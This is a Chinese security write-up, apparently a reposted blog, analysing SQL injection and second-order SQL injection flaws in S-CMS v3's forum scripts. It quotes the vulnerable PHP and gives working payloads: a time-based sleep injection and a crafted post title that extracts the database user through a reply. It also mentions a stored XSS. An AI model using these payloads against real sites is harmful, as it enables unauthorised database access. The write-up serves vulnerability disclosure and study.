2. 程式人生 > >S-CMS企建v3二次SQL註入

S-CMS企建v3二次SQL註入

阿新 發佈:2018-12-20
etc success alt soc 是我 mysqli 拼接 而在 演示

S-CMS企建v3二次SQL註入

0x01 前言

繼上一篇的S-CMS漏洞再來一波!
首發T00ls

0x2 目錄

Sql註入
二次SQL註入

0x03 Sql註入

漏洞文件:\scms\bbs\bbs.php

$action=$_GET["action"];
$S_id=$_GET["S_id"];
if($action=="add"){
$B_title=htmlspecialchars($_POST["B_title"]);
$B_sort=$_POST["B_sort"];
$B_content=htmlspecialchars($_POST["B_content"]);
$S_sh=getrs("select * from SL_bsort where S_id=".intval($B_sort),"S_sh");
if($S_sh==1){
$B_sh=0;
}else{
$B_sh=1;
}
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values(‘".$B_title."‘,‘".$B_content."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values(‘".$B_title."‘,‘".$B_content."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$B_sort.",".$B_sh.")");
$sql="Select * from SL_bbs order by B_id desc limit 1";
$result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
    if (mysqli_num_rows($result) > 0) {
        $B_id=$row["B_id"];
    }

相對來說這個註入比較簡單,$B_sort 無過濾直接從POST獲取,然而在SELECT查詢的時候使用了intval函數來過濾變量。不過後面在insert的時候卻沒有任何過濾(無單引號包含)導致sql註入。

漏洞驗證:
—Payload:
——http://127.0.0.1/scms/bbs/bbs.php?action=add
——B_title=test&B_content=test11&B_sort=1 and sleep(5)
技術分享圖片
$debug調試信息:
Insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sort,B_sh) values(‘test‘,‘test11‘,‘2018-12-08 14:21:25‘,17,1 and sleep(5),0)

0x04 二次註入

漏洞文件:
\scms\bbs\bbs.php
\scms\bbs\item.php

先看一下漏洞觸發點:

$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;
    $result = mysqli_query($conn, $sql);
$row = mysqli_fetch_assoc($result);
    if (mysqli_num_rows($result) > 0) {
    $B_title=lang($row["B_title"]);
    $B_content=lang($row["B_content"]);
    $B_time=$row["B_time"];
    $B_sort=$row["B_sort"];
    $S_title=lang($row["S_title"]);
    $B_view=$row["B_view"];
    $M_login=$row["M_login"];
    $M_pic=$row["M_pic"];
    $L_title=$row["L_title"];
    }
if(substr($M_pic,0,4)!="http"){
$M_pic="../media/".$M_pic;
}
$sql2="Select count(*) as B_count from SL_bbs where B_sub=".$id;

$result2 = mysqli_query($conn, $sql2);
$row2 = mysqli_fetch_assoc($result2);
$B_count=$row2["B_count"];
if($action=="reply"){
$B_contentx=$_POST["B_content"];
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values(‘[回復]".$B_title."‘,‘".$B_contentx."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$id.",".$B_sort.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values(‘[回復]".$B_title."‘,‘".$B_contentx."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$id.",".$B_sort.")");
box("回復成功!","item.php?id=".$id,"success");
}

簡單說一下邏輯,第一步執行的sql語句是查詢帖子的詳細內容($id帖子id)
$sql="Select * from SL_bbs,SL_bsort,SL_member,SL_lv where B_sort=S_id and B_mid=M_id and M_lv=L_id and B_id=".$id;
然後把查詢到的內容各自賦給一個變量

    $B_title=lang($row["B_title"]);
    $B_content=lang($row["B_content"]);
    $B_time=$row["B_time"];
    $B_sort=$row["B_sort"];
..............................

到後面判斷$action=="reply",進入回復帖子功能處

if($action=="reply"){
$B_contentx=$_POST["B_content"];
$debug("insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values(‘[回復]".$B_title."‘,‘".$B_contentx."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$id.",".$B_sort.")");
mysqli_query($conn,"insert into SL_bbs(B_title,B_content,B_time,B_mid,B_sub,B_sort) values(‘[回復]".$B_title."‘,‘".$B_contentx."‘,‘".date(‘Y-m-d H:i:s‘)."‘,".$_SESSION["M_id"].",".$id.",".$B_sort.")");
box("回復成功!","item.php?id=".$id,"success");
}

可以看到$B_contentx=$_POST["B_content"]無過濾,這裏會觸發儲存xss漏洞。然而這個不是重點,繼續看執行的insert語句,發現$B_title等變量都拼接了進來,沒有sql過濾,而這些變量是從數據庫查詢出來的(帖子的標題等),然而回過頭去看上面的sql註入,不就是發帖功能的地方麽。所以這些變量可控,導致二次sql註入。

漏洞觸發流程:
—首先我們去發帖B_title的值是我們的payload,還有其他的值
——B_title=‘,(select user()),‘‘,1,999,1)%23&B_content=aaaaaaaaaaaa&B_sort=1
—然後我們去獲取帖子id,這個沒有特別好的辦法只能去摸索著找,可以先根據樓層判斷一共有多少帖子,然後一點一點的往後找,根據內容判斷是否是我們發布的帖子
——http://127.0.0.1//scms/bbs/item.php?id=帖子id
—獲取到帖子後去觸發漏洞
——http://127.0.0.1//scms/bbs/item.php?action=reply&id=帖子id
——B_content=test
—這裏我說一下payload為什麽是這樣的,這樣構造完全是為了達到回顯註入,因為後面打印回復內容的時候執行的sql註入是
——$sql="select * from SL_bbs where B_sub=".$id." order by B_id asc";
—而B_sub可控(在Insert的時候插入的),這樣我們就能直接獲取回顯。

漏洞演示:
—Payload1
——127.0.0.1/scms/bbs/bbs.php?action=add
——B_title=‘,(select user()),‘‘,1,666,1)%23&B_content=hello_admin&B_sort=1
技術分享圖片

—Payload2
——獲取帖子id
——http://127.0.0.1//scms/bbs/item.php?id=30
技術分享圖片

—Payload3
——http://127.0.0.1//scms/bbs/item.php?action=reply&id=30
——B_content=test
技術分享圖片

執行完成!最後我們就可以去訪問我們的回復然後拿到回顯。
http://127.0.0.1//scms/bbs/item.php?id=666
這次id參數指向的是我們填的B_sub值
技術分享圖片

0x05 結束語

之前建的群由於某些原因解散了,說聲抱歉!

S-CMS企建v3二次SQL註入

相關推薦

S-CMSv3SQL

etc success alt soc 是我 mysqli 拼接 而在 演示 S-CMS企建v3二次SQL註入 0x01 前言 繼上一篇的S-CMS漏洞再來一波!首發T00ls 0x2 目錄 Sql註入二次SQL註入 0x03 Sql註入 漏洞文件:\scms\bbs\bb

S-CMSv3SQL注入

0x00 前言 悄悄的說一句,頭一次挖到二次注入,我發現我膨脹了!雖然挺簡單的,但也是My第一次,第一次!!!! 首發T00ls 0x01 目錄 Sql注入 二次SQL注入 0x02 Sql注入 漏洞檔案:\scms\bbs\bbs.php $action=$_GET["ac

Sql 詳解:寬字節+

.com 主動 一個 from 攻擊 過濾 分享圖片 size 就是 sql註入漏洞 原理:由於開發者在編寫操作數據庫代碼時,直接將外部可控參數拼接到sql 語句中,沒有經過任何過濾就直接放入到數據庫引擎中執行了。 攻擊方式: (1) 權限較大時,直接寫入webshell

記一dvwa sql爆庫

dvwasql註入 python安裝 sqlmap安裝及使用 一 前期準備1 sqlmap在windows環境下需要python2.7的支持,在python官網下載即可https://www.python.org/2 安裝python2.7,默認即可。安裝完成後需要配置下環境變量。右擊計算機-&g

對真實網站的SQL———SQLmap使用

md5 password blog 發生 為我 www mysql 賬戶 9.png 網上有許多手工註入SQL的例子和語句,非常值得我們學習,手工註入能讓我們更加理解網站和數據庫的關系,也能明白為什麽利用註入語句能發現網站漏洞。 因為我是新手,註入語句還不太熟悉,我這次是手

Jmeter 接口測試對上接口結果處理作為參 Bean Shell Processor

數據返回 接口 測試 ges alt 返回值 mage logs ima 1.線程組設置,HTTP COOKIE ,HTTP請求默認值設置,;註:Cookie主要傳遞登錄狀態 2.設置登錄 http 請求 3.登錄後,訪問數據接口(並對數據返回值做後置處理)

記錄一網站漏洞修復過程(三):第二輪處理(攔截SQL、跨站腳本攻擊XSS)

cat nbsp ebe 嵌入 網頁 防止 記錄 用戶輸入 light 在程序編寫的時候采用參數化的SQL語句可以有效的防止SQL註入,但是當程序一旦成型,再去修改大量的數據庫執行語句並不是太現實,對網頁表單上輸入進行校驗是易於實現的方法。在webForm 頁面中開啟校驗屬

SQL漏洞的分析與利用(

manage 如果 得到 nio 學習筆記 sql註入 .com 密碼 vpd Access手工註入 1.實驗環境:實驗平臺:小旋風ASPWeb服務器目標網站:南方數據2.02.打開網站,隨意點開一個頁面看到?id=4說明有參數傳遞,用的是get方法,可能是一個註入點加入判

DWVA手把手教程()——SQL

http 修改 get AR 黑板 歡迎來到 ots 技術 簡單 歡迎來到sql註入章節,此次我們使用的工具為sqlmap。 我們已經察覺到了經典參數id的存在,厚著臉皮的說一句:sql註入漏洞是存在的。 那麽我們應該如何去證明呢? 好習慣,先抓包,get方法提交的,

sql & webshell 的美麗“邂逅”

webshell waf 攻擊 木馬 sql註入 引言 ?一波未平,一波又起。金融公司的業務實在是太引人耳目,何況我們公司的業處正處於風口之上(區塊鏈金融),並且每天有大量現金交易,所以不知道有多少黑客躲在暗處一直在盯著你的系統,讓你防不勝防,並且想方設法的找到突破點,以達到黑客的目的來獲

ADO。Net()——防止SQL攻擊

多少 ext args create 查詢 屬性 匹配 拼接 註入 規避SQL註入 如果不規避,在黑窗口裏面輸入內容時利用拼接語句可以對數據進行攻擊 如:輸入Code值 p001‘ union select * from Info where ‘1‘=‘1

齊博cms最新SQL網站漏洞 可遠程執行代碼提權

pid guide oss cms sse str ctu mem 一個 齊博cms整站系統,是目前建站系統用的較多的一款CMS系統,開源,免費,第三方擴展化,界面可視化的操作,使用簡單,便於新手使用和第二次開發,受到許多站長們的喜歡。開發架構使用的是php語言以及mysq

記一簡單的sql

-- 截圖 是否有效 src bsp 構造 mage nbsp inf 什麽是sql註入攻擊? 所謂SQL註入式攻擊,就是攻擊者把SQL命令插入到Web表單的輸入域或頁面請求的查詢字符串,欺騙服務器執行惡意的SQL命令。在某些表單中,用戶輸入的內容直接用

c#配置問題以及簡單防止sql,連接池問題,sqldatareader對象對於connection對象的釋放

c#添加引用。system configurationconfigurationManager.AppSettings[“”]<appSetings><add key=“” value=“”></appSetings><connectionStrings><

SQL原理講解及防範

ant htm part 無效 快樂 日常 field users lib 原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,國內最大的程序員社區CSDN網站

談談PHP網站的防SQL

效果 query 數據庫服務 data sqlite nbsp lds esc informix SQL(Structured Query Language)即結構化查詢語言。SQL 註入,就是把 SQL 命令插入到 Web 表單的輸入域或頁面請求參數的查詢字符串中,在 W

PDO防止SQL具體介紹

取代 能夠 article 數據庫 bsp 什麽 幫助 用戶 機會 <span style="font-size:18px;"><?php $dbh = new PDO("mysql:host=localhost; dbname=demo", "use

PHPCMS v9.6.0 wap模塊 SQL

sed injection update pytho see repl nbsp per pre 調試這個漏洞的時候踩了個坑,影響的版本是php5.4以後。 由於漏洞是由parse_str()函數引起的,但是這個函數在gpc開啟的時候(也就是php5.4以下)會對單引號進行

Joomla!3.7.0 Core SQL漏洞動態調試草稿

src cnblogs phpstorm prop ets legacy gets oom users 從這個頁面開始下斷點:Joomla_3.7.0/components/com_fields/controller.php 調用父類的構造

【EF框架】使用params參數傳值防止SQL報錯處理

collect oar mapping cnblogs ken datetime nbsp .com src 通過SqlParameter傳時間參數,代碼如下: var param = new List<SqlParamete